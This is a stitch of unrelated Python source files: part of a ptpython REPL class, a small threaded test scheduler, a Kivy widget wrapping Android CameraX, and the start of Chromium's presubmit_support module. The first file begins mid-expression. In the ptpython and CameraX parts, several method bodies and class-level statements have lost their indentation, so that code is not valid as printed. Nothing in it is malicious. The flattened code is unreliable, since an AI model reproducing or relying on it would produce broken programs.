                    ),
                    simple_option(
                        title="Blank line after input",
                        description="Insert a blank line after the input.",
                        field_name="insert_blank_line_after_input",
                    ),
                    simple_option(
                        title="Blank line after output",
                        description="Insert a blank line after the output.",
                        field_name="insert_blank_line_after_output",
                    ),
                    simple_option(
                        title="Show signature",
                        description="Display function signatures.",
                        field_name="show_signature",
                    ),
                    simple_option(
                        title="Show docstring",
                        description="Display function docstrings.",
                        field_name="show_docstring",
                    ),
                    simple_option(
                        title="Show line numbers",
                        description="Show line numbers when the input consists of multiple lines.",
                        field_name="show_line_numbers",
                    ),
                    simple_option(
                        title="Show Meta+Enter message",
                        description="Show the [Meta+Enter] message when this key combination is required to execute commands. "
                        + "(This is the case when a simple [Enter] key press will insert a newline.",
                        field_name="show_meta_enter_message",
                    ),
                    simple_option(
                        title="Wrap lines",
                        description="Wrap lines instead of scrolling horizontally.",
                        field_name="wrap_lines",
                    ),
                    simple_option(
                        title="Show status bar",
                        description="Show the status bar at the bottom of the terminal.",
                        field_name="show_status_bar",
                    ),
                    simple_option(
                        title="Show sidebar help",
                        description="When the sidebar is visible, also show this help text.",
                        field_name="show_sidebar_help",
                    ),
                    simple_option(
                        title="Highlight parenthesis",
                        description="Highlight matching parenthesis, when the cursor is on or right after one.",
                        field_name="highlight_matching_parenthesis",
                    ),
                    simple_option(
                        title="Reformat output (black)",
                        description="Reformat outputs using Black, if possible (experimental).",
                        field_name="enable_output_formatting",
                    ),
                    simple_option(
                        title="Enable pager for output",
                        description="Use a pager for displaying outputs that don't "
                        "fit on the screen.",
                        field_name="enable_pager",
                    ),
                ],
            ),
            OptionCategory(
                "Colors",
                [
                    simple_option(
                        title="Syntax highlighting",
                        description="Use colors for syntax highligthing",
                        field_name="enable_syntax_highlighting",
                    ),
                    simple_option(
                        title="Swap light/dark colors",
                        description="Swap light and dark colors.",
                        field_name="swap_light_and_dark",
                    ),
                    Option(
                        title="Code",
                        description="Color scheme to use for the Python code.",
                        get_current_value=lambda: self._current_code_style_name,
                        get_values=lambda: {
                            name: partial(self.use_code_colorscheme, name)
                            for name in self.code_styles
                        },
                    ),
                    Option(
                        title="User interface",
                        description="Color scheme to use for the user interface.",
                        get_current_value=lambda: self._current_ui_style_name,
                        get_values=lambda: dict(
                            (name, partial(self.use_ui_colorscheme, name))
                            for name in self.ui_styles
                        ),
                    ),
                    Option(
                        title="Color depth",
                        description="Monochrome (1 bit), 16 ANSI colors (4 bit),\n256 colors (8 bit), or 24 bit.",
                        get_current_value=lambda: COLOR_DEPTHS[self.color_depth],
                        get_values=lambda: {
                            name: partial(self._use_color_depth, depth)
                            for depth, name in COLOR_DEPTHS.items()
                        },
                    ),
                    Option(
                        title="Min brightness",
                        description="Minimum brightness for the color scheme (default=0.0).",
                        get_current_value=lambda: "%.2f" % self.min_brightness,
                        get_values=lambda: {
                            "%.2f" % value: partial(self._set_min_brightness, value)
                            for value in brightness_values
                        },
                    ),
                    Option(
                        title="Max brightness",
                        description="Maximum brightness for the color scheme (default=1.0).",
                        get_current_value=lambda: "%.2f" % self.max_brightness,
                        get_values=lambda: {
                            "%.2f" % value: partial(self._set_max_brightness, value)
                            for value in brightness_values
                        },
                    ),
                ],
            ),
        ]
    def _create_application(
        self, input: Optional[Input], output: Optional[Output]
    ) -> Application:
        """
        Create an `Application` instance.
        """
        return Application(
            layout=self.ptpython_layout.layout,
            key_bindings=merge_key_bindings(
                [
                    load_python_bindings(self),
                    load_auto_suggest_bindings(),
                    load_sidebar_bindings(self),
                    load_confirm_exit_bindings(self),
                    # Open-in-editor is only active when enabled in settings.
                    ConditionalKeyBindings(
                        load_open_in_editor_bindings(),
                        Condition(lambda: self.enable_open_in_editor),
                    ),
                    # Extra key bindings should not be active when the sidebar is visible.
                    ConditionalKeyBindings(
                        self.extra_key_bindings,
                        Condition(lambda: not self.show_sidebar),
                    ),
                ]
            ),
            # Dynamic lookups so that runtime setting changes take effect.
            color_depth=lambda: self.color_depth,
            paste_mode=Condition(lambda: self.paste_mode),
            mouse_support=Condition(lambda: self.enable_mouse_support),
            style=DynamicStyle(lambda: self._current_style),
            style_transformation=self.style_transformation,
            include_default_pygments_style=False,
            reverse_vi_search_direction=True,
            input=input,
            output=output,
        )
    def _create_buffer(self) -> Buffer:
        """
        Create the `Buffer` for the Python input.
        """
        python_buffer = Buffer(
            name=DEFAULT_BUFFER,
            complete_while_typing=Condition(lambda: self.complete_while_typing),
            enable_history_search=Condition(lambda: self.enable_history_search),
            tempfile_suffix=".py",
            history=self.history,
            # Completion runs in a background thread to keep typing responsive.
            completer=ThreadedCompleter(self._completer),
            validator=ConditionalValidator(
                self._validator, Condition(lambda: self.enable_input_validation)
            ),
            auto_suggest=ConditionalAutoSuggest(
                ThreadedAutoSuggest(AutoSuggestFromHistory()),
                Condition(lambda: self.enable_auto_suggest),
            ),
            accept_handler=self._accept_handler,
            # Triggers the signature lookup (see `_on_input_timeout`).
            on_text_changed=self._on_input_timeout,
        )
        return python_buffer
@property
def editing_mode(self) -> EditingMode:
return self.app.editing_mode
@editing_mode.setter
def editing_mode(self, value: EditingMode) -> None:
self.app.editing_mode = value
@property
def vi_mode(self) -> bool:
return self.editing_mode == EditingMode.VI
@vi_mode.setter
def vi_mode(self, value: bool) -> None:
if value:
self.editing_mode = EditingMode.VI
else:
self.editing_mode = EditingMode.EMACS
    def _on_input_timeout(self, buff: Buffer, loop=None) -> None:
        """
        When there is no input activity,
        in another thread, get the signature of the current code.
        """
        app = self.app

        # Never run multiple get-signature threads.
        if self._get_signatures_thread_running:
            return
        self._get_signatures_thread_running = True

        document = buff.document
        loop = loop or get_event_loop()

        def run():
            # Executed in a worker thread (via run_in_executor below).
            script = get_jedi_script_from_document(
                document, self.get_locals(), self.get_globals()
            )

            # Show signatures in help text.
            if script:
                try:
                    signatures = script.get_signatures()
                except ValueError:
                    # e.g. in case of an invalid \\x escape.
                    signatures = []
                except Exception:
                    # Sometimes we still get an exception (TypeError), because
                    # of probably bugs in jedi. We can silence them.
                    # See: https://github.com/davidhalter/jedi/issues/492
                    signatures = []
                else:
                    # Try to access the params attribute just once. For Jedi
                    # signatures containing the keyword-only argument star,
                    # this will crash when retrieving it the first time with
                    # AttributeError. Every following time it works.
                    # See: https://github.com/jonathanslenders/ptpython/issues/47
                    #      https://github.com/davidhalter/jedi/issues/598
                    try:
                        if signatures:
                            signatures[0].params
                    except AttributeError:
                        pass
            else:
                signatures = []

            self._get_signatures_thread_running = False

            # Set signatures and redraw if the text didn't change in the
            # meantime. Otherwise request new signatures.
            if buff.text == document.text:
                self.signatures = signatures

                # Set docstring in docstring buffer.
                if signatures:
                    string = signatures[0].docstring()
                    if not isinstance(string, str):
                        string = string.decode("utf-8")
                    self.docstring_buffer.reset(
                        document=Document(string, cursor_position=0)
                    )
                else:
                    self.docstring_buffer.reset()

                app.invalidate()
            else:
                # Text changed while we computed; re-run for the new text.
                self._on_input_timeout(buff, loop=loop)

        loop.run_in_executor(None, run)
    def on_reset(self) -> None:
        # Clear stale signatures when the prompt resets.
        self.signatures = []

    def enter_history(self) -> None:
        """
        Display the history.
        """
        app = get_app()
        app.vi_state.input_mode = InputMode.NAVIGATION

        history = PythonHistory(self, self.default_buffer.document)

        import asyncio

        from prompt_toolkit.application import in_terminal

        async def do_in_terminal() -> None:
            # Run the history application on top of the current terminal.
            async with in_terminal():
                result = await history.app.run_async()
                if result is not None:
                    self.default_buffer.text = result

                app.vi_state.input_mode = InputMode.INSERT

        asyncio.ensure_future(do_in_terminal())
    def read(self) -> str:
        """
        Read the input.

        This will run the Python input user interface in another thread, wait
        for input to be accepted and return that. By running the UI in another
        thread, we avoid issues regarding possibly nested event loops.

        This can raise EOFError, when Control-D is pressed.
        """

        # Capture the current input_mode in order to restore it after reset,
        # for ViState.reset() sets it to InputMode.INSERT unconditionally and
        # doesn't accept any arguments.
        def pre_run(
            last_input_mode: InputMode = self.app.vi_state.input_mode,
        ) -> None:
            if self.vi_keep_last_used_mode:
                self.app.vi_state.input_mode = last_input_mode

            if not self.vi_keep_last_used_mode and self.vi_start_in_navigation_mode:
                self.app.vi_state.input_mode = InputMode.NAVIGATION

        # Run the UI.
        result: str = ""
        exception: Optional[BaseException] = None

        def in_thread() -> None:
            # Runs the UI loop until non-empty input is accepted (or an
            # exception/EOF occurs); communicates via the nonlocals above.
            nonlocal result, exception
            try:
                while True:
                    try:
                        result = self.app.run(pre_run=pre_run)

                        if result.lstrip().startswith("\x1a"):
                            # When the input starts with Ctrl-Z, quit the REPL.
                            # (Important for Windows users.)
                            raise EOFError

                        # Remove leading whitespace.
                        # (Users can add extra indentation, which happens for
                        # instance because of copy/pasting code.)
                        result = unindent_code(result)

                        if result and not result.isspace():
                            return
                    except KeyboardInterrupt:
                        # Abort - try again.
                        self.default_buffer.document = Document()
            except BaseException as e:
                exception = e
                return
            finally:
                if self.insert_blank_line_after_input:
                    self.app.output.write("\n")

        # Block the calling thread until the UI thread is done.
        thread = threading.Thread(target=in_thread)
        thread.start()
        thread.join()

        if exception is not None:
            raise exception
        return result
|
schedule.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: leeyoshinari
import queue
from threading import Thread
from testing import Testing
class Scheduler(object):
    """Queues test tasks and runs them one at a time on a worker thread."""

    def __init__(self):
        self.testing = Testing()
        self.test_task = queue.Queue()  # pending-task queue
        worker_thread = Thread(target=self.worker)
        worker_thread.start()

    @property
    def task(self):
        # Write-only property: reading a pending task is not supported.
        return None

    @task.setter
    def task(self, value):
        # Enqueue a (callable, argument) pair for the worker thread.
        self.test_task.put((self.testing.run, value))

    def worker(self):
        """
        Pull test tasks off the queue and execute them, forever.
        """
        while True:
            func, param = self.test_task.get()
            func(param)
            self.test_task.task_done()
|
preview_camerax.py | # An implementation of Android CameraX called from a Kivy Preview widget.
#
# About CameraX:
# https://developer.android.com/training/camerax
# Tested devices:
# https://developer.android.com/training/camerax/devices
#
# Source
# https://github.com/Android-for-Python/Camera4Kivy/preview_camerax.py
#
from kivy.clock import Clock, mainthread
from kivy.graphics import Fbo, Callback, Rectangle, Rotate, Scale, Translate,\
Color
from kivy.graphics.texture import Texture
from datetime import datetime
from os.path import exists, join
from os import mkdir, remove
from pathlib import Path
from threading import Thread
from gestures4kivy import CommonGestures
from camera4kivy.preview_common import PreviewCommon
from android.storage import app_storage_path, primary_external_storage_path
from android.runnable import run_on_ui_thread
from android import mActivity, api_version
from jnius import autoclass, PythonJavaClass, java_method
GL_TEXTURE_EXTERNAL_OES = autoclass(
'android.opengl.GLES11Ext').GL_TEXTURE_EXTERNAL_OES
Environment = autoclass('android.os.Environment')
CameraX = autoclass('org.kivy.camerax.CameraX')
if api_version >= 29:
ContentValues = autoclass('android.content.ContentValues')
MediaStoreMediaColumns =\
autoclass('android.provider.MediaStore$MediaColumns')
MediaStoreImagesMedia =\
autoclass('android.provider.MediaStore$Images$Media')
FileInputStream = autoclass('java.io.FileInputStream')
FileUtils = autoclass('android.os.FileUtils')
class PreviewCameraX(PreviewCommon, CommonGestures):
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # No camera bound yet; gesture features stay disabled until
        # connect_camera() configures them.
        self._camera = None
        self.enable_zoom_gesture = False
        self.enable_focus_gesture = False
##############################
# Lifecycle events
##############################
    def connect_camera(self,
                       enable_photo = True,
                       enable_video = True,
                       enable_analyze_imageproxy = False,
                       camera_id = 'back',
                       optimize = 'quality',
                       sensor_resolution = None,
                       default_flash = 'off',
                       default_zoom = 0.5,
                       enable_zoom_gesture = True,
                       enable_focus_gesture = True,
                       data_format = 'yuv420',
                       filepath_callback = None,
                       analyze_proxy_callback = None,
                       analyze_callback = None,
                       canvas_callback = None,
                       **kwargs):
        """
        Validate the options, create the Java-side CameraX instance and
        start the preview. Invalid option values fall back to safe defaults
        rather than raising.
        """
        self._camera = None
        self._update_ev = None
        self._name_pipe = []
        self.texture_size = []
        self.rotation = 0
        self.capture_in_progress = False
        # uniform case
        self.flash_state = default_flash.lower()
        data_format = data_format.lower()
        optimize = optimize.lower()
        self.canvas_callback = canvas_callback
        self.set_filepath_callback(filepath_callback)
        self.set_facing(camera_id)
        self.set_resolution(sensor_resolution)
        self.enable_data = enable_analyze_imageproxy
        # flash
        if self.flash_state not in ['on','off','auto']:
            self.flash_state = 'off'
        # optimize
        if optimize not in ['latency','quality']:
            optimize = 'quality'
        # zoom and focus
        default_zoom = min(max(default_zoom,0),1)  # clamp to [0, 1]
        self.enable_zoom_gesture = enable_zoom_gesture
        self.enable_focus_gesture = enable_focus_gesture
        # Analyse Image format
        if data_format not in ['rgba', 'yuv420']:
            data_format = 'yuv420'
        self._analyze_callback = analyze_callback
        self._analyze_proxy_callback = analyze_proxy_callback
        # These Java callbacks will execute in Java Main Thread
        self.cb_wrapper = CallbackWrapper(self._filename_callback,
                                          self._analyze_image_proxy,
                                          self._configure_pipeline)
        # Create an Android camera with the required behavior
        self._camera = CameraX(
            enable_photo,
            enable_video,
            self.enable_data,
            self.facing,
            self._sensor_resolution,
            self.aspect_ratio,
            self.cb_wrapper,
            self.flash_state,
            optimize,
            default_zoom,
            data_format)
        # Configure the camera for the Kivy view port
        self._configure_camera(True)
    # destroy camera
    @run_on_ui_thread
    def disconnect_camera(self):
        # Stop any video capture, stop the preview pipeline and release the
        # Java camera. Runs on the Android UI thread.
        self.stop_capture_video()
        self._deschedule_pipeline()
        if self._camera:
            self._camera.unbind_camera()
            self._camera = None

    # configure camera
    def _configure_camera(self, start):
        # Fit the preview into the Kivy viewport and (re)start the camera.
        # With no camera available, paint a white placeholder rectangle.
        # NOTE(review): the `start` argument is not used in this body —
        # confirm whether it is required by callers elsewhere.
        self.configure_viewport()
        if self._camera:
            self._camera.setViewPort(self.view_size)
            self._camera.startCamera()
        else:
            self.canvas.clear()
            with self.canvas:
                Color(1,1,1,1)
                Rectangle(size = self.view_size, pos = self.view_pos)

    # Device Rotate
    def on_size(self, instance, size):
        # Widget resize (e.g. on device rotation): abort any video capture
        # and reconfigure the preview for the new geometry.
        if self._camera:
            self.stop_capture_video()
            self._configure_camera(False)
##################################
# Parse options
##################################
def set_facing(self, facing):
facing = facing.lower()
if facing == '0':
facing = 'back'
elif facing == '1':
facing = 'front'
elif facing not in ['back','front']:
facing = 'back'
self.facing = facing
    ##############################
    # Preview Widget Touch Events
    ##############################
    # CommonGestures Touch Events

    # tap for focus
    def cg_tap(self, touch, x, y):
        # Gesture hook from CommonGestures: tap-to-focus when enabled.
        if self._camera and self.enable_focus_gesture:
            self.focus(x, y)

    # pinch/spread for zoom
    def cg_scale(self, touch0, touch1, scale, x, y):
        # Gesture hook from CommonGestures: pinch/spread zoom when enabled.
        if self._camera and self.enable_zoom_gesture:
            self.zoom_delta(scale)
##############################
# User events
##############################
def capture_photo(self, location = '', subdir = '', name = ''):
if self._camera:
self.capture_in_progress = True
self._set_location(location)
subdir = self._default_subdir_android(subdir)
name = self._default_file_name(name, '.jpg')
if self.file_storage:
self._name_pipe.append(join(subdir, name))
self._camera.capture_photo(subdir, name, self.file_storage)
def capture_video(self, location = '', subdir = '', name = ''):
if self._camera:
self.capture_in_progress = True
self._set_location(location)
subdir = self._default_subdir_android(subdir)
name = self._default_file_name(name,'.mp4')
if self.file_storage:
self._name_pipe.append(join(subdir, name))
self._camera.capture_video(subdir, name, self.file_storage)
def stop_capture_video(self):
if self._camera:
self._camera.stop_capture_video()
    def capture_screenshot(self, location = '.', subdir = '', name = ''):
        # Save a screenshot of the preview widget as a .jpg, either directly
        # to file storage or via the Android MediaStore (shared storage on
        # api >= 30).
        view_crop = self.screenshot_crop()
        self._set_location(location)
        subdir = self._default_subdir_android(subdir)
        name = self._default_file_name(name, '.jpg')
        # Crop the widget snapshot down to the visible preview region.
        tex = self.export_as_image().texture.get_region(*view_crop)
        path = join(subdir, name)
        if self.file_storage:
            # local or, shared and api<=29
            tex.save(path, flipped = True)
            if self.callback:
                self.callback(path)
        else:
            # MediaStore
            cache = self.cache_path()
            if cache:
                # write to cache
                cachefile = join(cache, name)
                tex.save(cachefile, flipped = True)
                # create MediaStore entry
                cv = ContentValues()
                cv.put(MediaStoreMediaColumns.DISPLAY_NAME, name)
                cv.put(MediaStoreMediaColumns.MIME_TYPE, 'image/jpeg')
                cv.put(MediaStoreMediaColumns.RELATIVE_PATH, subdir)
                root_uri = MediaStoreImagesMedia.getContentUri('external')
                context = mActivity.getApplicationContext()
                uri = context.getContentResolver().insert(root_uri, cv)
                # copy cache file to MediaStore
                rs = FileInputStream(cachefile)
                ws = context.getContentResolver().openOutputStream(uri)
                FileUtils.copy(rs,ws)
                ws.flush()
                ws.close()
                rs.close()
                # The cache copy is no longer needed once copied.
                remove(cachefile)
                if self.callback:
                    self.callback(path)
    # Select back, front camera
    def select_camera(self, facing):
        """Select the camera: 'front', '1', 'toggle', or anything else for
        'back'.  Returns the facing actually selected.

        If a capture is in progress, any video capture is stopped and the
        switch is deferred (polled via the Kivy Clock) until the capture
        completes.
        """
        if self._camera:
            facing = facing.lower()
            if facing == 'toggle':
                if self.facing == 'back':
                    self.facing = 'front'
                else:
                    self.facing = 'back'
            elif facing == 'front' or facing == '1':
                self.facing = 'front'
            else:
                self.facing = 'back'
            # may have to wait for a capture to complete
            if not self.capture_in_progress:
                self.do_select_camera()
            else:
                self.stop_capture_video()
                # Poll until capture_in_progress clears, then switch.
                self._facing_ev = Clock.schedule_interval(
                    self.can_select_camera, 1 / 30)
            facing = self.facing
        return facing
    def can_select_camera(self,dt):
        """Clock callback: perform a deferred camera switch once the
        in-progress capture has finished, then stop polling."""
        if not self.capture_in_progress:
            self.do_select_camera()
            Clock.unschedule(self._facing_ev)
    # Must run on the Android UI thread (CameraX requirement).
    @run_on_ui_thread
    def do_select_camera(self):
        self._camera.select_camera(self.facing)
# Sequence flash : off, on, auto, ...
def flash(self):
if self._camera:
if self.flash_state == 'off':
self.flash_state = 'on'
elif self.flash_state == 'on':
self.flash_state = 'auto'
else:
self.flash_state = 'off'
self.flash_state = self._camera.flash(self.flash_state)
return self.flash_state
return "off"
    # if enable_focus_gesture == True, then this is called by a tap gesture
    def focus(self, x, y):
        """Request focus at (x, y), if a camera is connected."""
        if self._camera:
            self._camera.focus(x, y)
    # if enable_zoom_gesture == True, then this called by pinch/spread gesture
    def zoom_delta(self, delta_scale):
        """Change zoom by a relative factor (False -> not absolute)."""
        if self._camera:
            self._camera.zoom(delta_scale, False)
    def zoom_abs(self, scale):
        """Set zoom to an absolute scale (True -> absolute)."""
        if self._camera:
            self._camera.zoom(scale, True)
##############################
# Create Preview Pipeline
##############################
    def _create_texture(self, size):
        """Create the texture that receives camera frames and return its GL
        texture id (handed to the Java camera in _create_pipeline()).

        GL_TEXTURE_EXTERNAL_OES targets need the custom fragment shader
        installed in _create_fbo() to be sampled.
        """
        self._camera_texture = Texture(width = size[0],
                                       height= size[1],
                                       target=GL_TEXTURE_EXTERNAL_OES,
                                       colorfmt='rgba')
        return int(self._camera_texture.id)
    def _create_fbo(self, texture_size, rotation):
        """Build the Fbo that samples the external camera texture and
        un-rotates it to display orientation.

        rotation: sensor rotation in degrees (0/90/180/270).  A 90/270
        rotation swaps the Fbo's width and height.
        """
        long_edge = max(texture_size)
        short_edge = min(texture_size)
        origin = (texture_size[0]/2, texture_size[1]/2)
        translate = 0
        scalex = 1
        scaley = 1
        # Re-center the rotated image inside the swapped-size Fbo.
        if rotation == 90:
            translate = -(long_edge - short_edge) /2
        elif rotation == 270:
            translate = (long_edge - short_edge) /2
        if texture_size[0] < texture_size[1]:
            translate = -translate
            scalex = -scalex
            scaley = -scaley
        if rotation in [90 , 270]:
            fbo_size = (texture_size[1],texture_size[0])
        else:
            fbo_size = texture_size
        self._fbo = Fbo(size=fbo_size)
        # samplerExternalOES is required to read a GL_TEXTURE_EXTERNAL_OES
        # texture (see _create_texture()).
        self._fbo.shader.fs = '''
            #extension GL_OES_EGL_image_external : require
            $HEADER$
            uniform samplerExternalOES texture1;
            void main()
            {
                gl_FragColor = texture2D(texture1, tex_coord0);
            }
        '''
        with self._fbo.before:
            Rotate(origin = origin, angle = 360 - rotation, axis = (0, 0, 1))
            Translate(translate, translate)
            Scale(scalex, scaley, 1, origin = origin )
            Rectangle(size = texture_size)
        with self._fbo:
            # NOTE(review): the lambda returns the bound 'bind' method
            # without calling it — confirm this is intended (ask_update()
            # in _update_pipeline() triggers this Callback).
            self._camera_texture_cb = Callback(lambda instr:
                                               self._camera_texture.bind)
# Run on Kivy main thread because required by FBO.
@mainthread
def _create_pipeline(self, texture_size, rotation):
id = self._create_texture(texture_size)
self._create_fbo(texture_size, rotation)
self._camera.setTexture(id,texture_size)
self._schedule_pipeline()
##############################
# Fill Preview Pipeline
##############################
    def _schedule_pipeline(self):
        """(Re)start the frame pump once camera, texture, and Fbo exist."""
        self._deschedule_pipeline()
        if self._camera and self._camera_texture and self._fbo.texture:
            self._set_surface_provider(True)
            # Daemon thread so it never blocks app exit.
            Thread(target=self._pipeline_thread,daemon=True).start()
    def _deschedule_pipeline(self):
        """Stop the per-frame Clock event and detach the surface provider."""
        if self._update_ev is not None:
            self._set_surface_provider(False)
            self._update_ev.cancel()
            self._update_ev = None
    def _pipeline_thread(self):
        """Thread entry point: poll _update_pipeline() at ~30 fps via the
        Kivy Clock."""
        fps = 30
        self._update_ev = Clock.schedule_interval(self._update_pipeline,
                                                  1 / fps)
    def _update_pipeline(self, dt):
        """Per-frame: when the Java side has a new image, redraw the Fbo,
        run the analyzer, and repaint the widget canvas."""
        if self._camera.imageReady():
            self._camera_texture_cb.ask_update()
            self._fbo.draw()
            self._analyze_texture()
            self._update_canvas()
    # Run on UI thread because required by CameraX
    @run_on_ui_thread
    def _set_surface_provider(self, enable):
        """Attach (True) or detach (False) the Java surface provider."""
        self._camera.setSurfaceProvider(enable)
    # Run on mainthread because required by Kivy canvas
    @mainthread
    def _update_canvas(self):
        """Paint the latest cropped frame onto the widget canvas, mirrored
        horizontally when the front camera is selected."""
        tex = self._fbo.texture.get_region(*self.crop)
        # moved from create_fbo
        if self.facing == 'front':
            # Mirror: draw with negative width starting at the right edge.
            view_size = (-self.view_size[0], self.view_size[1])
            view_pos = (self.view_pos[0] + self.view_size[0],
                        self.view_pos[1])
        else:
            view_size = self.view_size
            view_pos = self.view_pos
        self.canvas.clear()
        with self.canvas:
            Color(1,1,1,1)
            Rectangle(texture= tex, size = view_size, pos = view_pos)
        if self.canvas_callback:
            # Let the app draw an overlay on top of the camera image.
            self.canvas_callback(tex, view_size, view_pos)
#######################################
# Storage Location
#######################################
def _set_location(self, location):
storage = location.lower()
if storage not in ['private', 'shared']:
storage = 'shared'
self.private_storage = storage == 'private'
self.file_storage = self.private_storage or api_version < 29
    def _default_location(self):
        """Return the root directory for captures.

        private           -> <app storage>/DCIM (created if missing)
        shared, api < 29  -> <primary storage>/DCIM/<app> (created if missing)
        shared, api >= 29 -> relative 'DCIM/<app>' path for MediaStore
        """
        if self.private_storage:
            root = join(app_storage_path(),Environment.DIRECTORY_DCIM)
            if not exists(root):
                mkdir(root)
        else:
            if api_version < 29:
                root = join(primary_external_storage_path(),
                            Environment.DIRECTORY_DCIM,
                            self._app_name())
                if not exists(root):
                    mkdir(root)
            else:
                # MediaStore RELATIVE_PATH wants a storage-relative path.
                root = join(Environment.DIRECTORY_DCIM, self._app_name())
        return root
    def _default_subdir_android(self, subdir=''):
        """Return the capture subdirectory, defaulting to today's date, and
        create it only when files are written directly (MediaStore creates
        directories itself from RELATIVE_PATH)."""
        root = self._default_location()
        if not subdir:
            # Today's date
            subdir = datetime.now().strftime("%Y_%m_%d")
        path = join(root,subdir)
        if self.private_storage or api_version < 29:
            if not exists(path):
                mkdir(path)
        return path
def _app_name(self):
context = mActivity.getApplicationContext()
appinfo = context.getApplicationInfo()
if appinfo.labelRes:
name = context.getString(appinfo.labelRes)
else:
name = appinfo.nonLocalizedLabel.toString()
return name
def cache_path(self):
context = mActivity.getApplicationContext()
cache = context.getExternalCacheDir()
return str(cache.toString())
#######################################
# Callbacks
#######################################
    # Runs in Java Main Thread
    def _configure_pipeline(self, croprect, resolution, rotation):
        """Camera-configuration callback from the Java side.

        Records the crop rectangle as [x, y, w, h] in texture coordinates
        (axes swapped for 90/270 rotations), the texture size, the
        widget-pixels-per-texture-row scale, and builds the pipeline.
        """
        if rotation in [ 90, 270]:
            # Width/height are swapped relative to the sensor.
            self.crop = [croprect.top, croprect.left,
                         croprect.bottom - croprect.top,
                         croprect.right - croprect.left]
        else:
            self.crop = [croprect.left, croprect.top,
                         croprect.right - croprect.left,
                         croprect.bottom - croprect.top]
        texture_size = [resolution.getWidth(), resolution.getHeight()]
        self.texture_size = texture_size
        # Scale factor from texture rows to widget pixels.
        self.tscale = self.view_size[1] / self.crop[3]
        self.rotation = rotation
        self._create_pipeline(texture_size, rotation)
    # Runs in some Java thread
    def _filename_callback(self, file_id):
        """Called by the Java side when a capture has been written.

        file_id is '' for plain-file saves, in which case the path queued
        by capture_photo()/capture_video() is reported instead.
        """
        if not file_id:
            # The callback returns "" for non-MediaStore saves
            if self._name_pipe:
                file_id = self._name_pipe[0]
                self._name_pipe = self._name_pipe[1:]
        self.capture_in_progress = False
        if self.callback:
            self.callback(str(file_id))
    def _analyze_texture(self):
        """Pass the cropped preview texture to the analyzer callback,
        unless raw ImageProxy analysis was requested (enable_data)."""
        if not self.enable_data and self._analyze_callback:
            tex = self._fbo.texture.get_region(*self.crop)
            self._analyze_callback(tex, self.view_pos,
                                   self.tscale, self.facing=='front')
    def _analyze_image_proxy(self, image_proxy):
        """Pass the raw CameraX ImageProxy to the analyzer callback when
        enable_data is set."""
        if self.enable_data and self._analyze_proxy_callback:
            if self.rotation in [0, 180]:
                tscale = self.view_size[1] / image_proxy.getHeight()
            else:
                # Rotated: the proxy's width maps to the widget's height.
                tscale = self.view_size[1] / image_proxy.getWidth()
            self._analyze_proxy_callback(image_proxy, self.view_pos,
                                         tscale, self.facing == 'front',
                                         self.rotation)
class CallbackWrapper(PythonJavaClass):
    """pyjnius implementation of the Java org.kivy.camerax.CallbackWrapper
    interface; forwards each Java callback to the corresponding Python
    callable (any of which may be None to ignore that event).

    The @java_method JNI signatures must match the Java interface exactly.
    """
    __javacontext__ = 'app'
    __javainterfaces__ = ['org/kivy/camerax/CallbackWrapper']
    def __init__(self, callback0, callback1, callback2):
        # callback0: str -> None, callback1: ImageProxy -> None,
        # callback2: (Rect, Size, int) -> None.
        super().__init__()
        self.callback0 = callback0
        self.callback1 = callback1
        self.callback2 = callback2
    @java_method('(Ljava/lang/String;)V')
    def callback_string(self, filepath):
        if self.callback0:
            self.callback0(filepath)
    @java_method('(Landroidx/camera/core/ImageProxy;)V')
    def callback_image(self, image):
        if self.callback1:
            self.callback1(image)
    @java_method('(Landroid/graphics/Rect;Landroid/util/Size;I)V')
    def callback_config(self, croprect, resolution, rotation):
        if self.callback2:
            self.callback2(croprect, resolution, rotation)
|
presubmit_support.py | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
from __future__ import print_function
__version__ = '2.0.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import argparse
import ast # Exposed through the API.
import contextlib
import cpplint
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import multiprocessing
import os # Somewhat exposed through the API.
import random
import re # Exposed through the API.
import signal
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback
import unittest # Exposed through the API.
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners
import owners_finder
import presubmit_canned_checks
import rdb_wrapper
import scm
import subprocess2 as subprocess # Exposed through the API.
if sys.version_info.major == 2:
# TODO(1009814): Expose urllib2 only through urllib_request and urllib_error
import urllib2 # Exposed through the API.
import urlparse
import urllib2 as urllib_request
import urllib2 as urllib_error
else:
import urllib.parse as urlparse
import urllib.request as urllib_request
import urllib.error as urllib_error
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
def time_time():
  """Thin wrapper around time.time() so tests can mock the clock without
  interfering with python system machinery."""
  return time.time()
class PresubmitFailure(Exception):
  """Exception used to signal a fatal presubmit-processing failure."""
  pass
class CommandData(object):
  """Description of one external test command to run via ThreadPool.

  The kwargs are copied and all three standard streams are forced to pipes
  so the output can be captured and stdin supplied by the runner.
  """
  def __init__(self, name, cmd, kwargs, message, python3=False):
    self.name = name
    self.cmd = cmd
    self.stdin = kwargs.get('stdin', None)
    merged = dict(kwargs)
    merged.update(stdin=subprocess.PIPE,
                  stdout=subprocess.PIPE,
                  stderr=subprocess.STDOUT)
    self.kwargs = merged
    self.message = message
    # Optional "informational" result factory, set by callers.
    self.info = None
    self.python3 = python3
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate().
class SigintHandler(object):
  # Return codes that indicate a process was killed by SIGINT.
  sigint_returncodes = {-signal.SIGINT,  # Unix
                        -1073741510,  # Windows
                        }
  def __init__(self):
    self.__lock = threading.Lock()
    # Subprocesses to terminate once a SIGINT is seen.
    self.__processes = set()
